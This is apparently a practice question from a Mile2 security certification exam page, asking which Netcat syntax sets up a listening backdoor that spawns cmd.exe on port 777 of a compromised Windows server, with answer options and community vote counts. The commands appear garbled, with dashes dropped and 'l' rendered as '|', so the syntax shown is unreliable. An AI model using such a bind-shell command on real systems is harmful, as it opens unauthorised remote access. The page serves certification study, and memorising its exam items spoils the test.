Mile2_Security
ML0-320 · Question #230
Using Netcat what would be the syntax to setup a listening back door from a compromised Windows Server that will spawn a shell when connecting to the remote server on port 777?
The correct answer is A. nc |p 777 e cmd.exe. See the full explanation below for the reasoning.
Question
Using Netcat what would be the syntax to setup a listening back door from a compromised Windows Server that will spawn a shell when connecting to the remote server on port 777?
Options
- Anc |p 777 e cmd.exe
- Bnc sh p 777 e cmd.exe
- Cnc |p 777 sh cmd.exe
- Dnc |p 777 exec cmd.exe
How the community answered
(30 responses)- A83% (25)
- B10% (3)
- C3% (1)
- D3% (1)
Community Discussion
No community discussion yet for this question.